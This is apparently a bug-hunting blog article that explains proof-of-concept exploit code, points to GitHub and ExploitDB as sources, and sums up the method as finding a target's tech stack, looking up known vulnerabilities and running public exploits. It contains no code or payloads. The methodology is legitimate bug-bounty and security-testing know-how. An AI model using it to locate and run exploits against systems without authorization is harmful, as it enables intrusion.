Bug Hunting | www.cyberodisha.com

What Is Proof of Concept (POC)? Definition, Steps & Best Practices

Introduction
You have identified that the target application contains vulnerabilities but to exploit them you need the proof of concept (POC) exploit code. If you don’t have the exploit code your only other option is to make it yourself. However, this is beyond the scope of this book.

Github
One of the best places to find exploit code is Github. GitHub is an American multinational corporation that provides hosting for software development and version control using Git. It offers the distributed version control and source code management functionality of Git, plus its own features. Developers love Github and hackers do as well.

You can easily search for a CVE on Github as shown in the above image. If there is a POC you will most likely find it on here. However, BE AWARE OF FAKE POCs as these exploits are not vetted and come from untrusted third parties.

ExploitDB
I already mentioned ExploitDB earlier so im not going to talk about it again but this is a great resource for finding POCs.

● https://www.exploit-db.com/

Summary
9 times out of 10 you are going to find the exploit code you’re looking for on Github or on ExploitDB. If you can’t find it in one of those locations it probably doesn’t exist and you will have to create your own POC. However, don’t be afraid to search for resources. Sometimes the POC code can be buried deep in a blog post on the 5th page of Google.

Exploitation
Once you have a working POC you are ready to test it against your target. I always recommend setting up a vulnerable machine to test the exploit against first so you know what to expect from a real target. Once you’re ready just run the exploit on your target and review the results to see if they are vulnerable or not.

Conclusion
Exploiting known vulnerabilities is one of the oldest tricks in the book. That being said it’s still one of the best methodologies to use for quick easy wins. There are really only three steps when using this approach. First determine your targets Tech stack, search for any vulnerabilities in that tech stack, and finally run the exploits.

Leave a Comment

Your email address will not be published. Required fields are marked *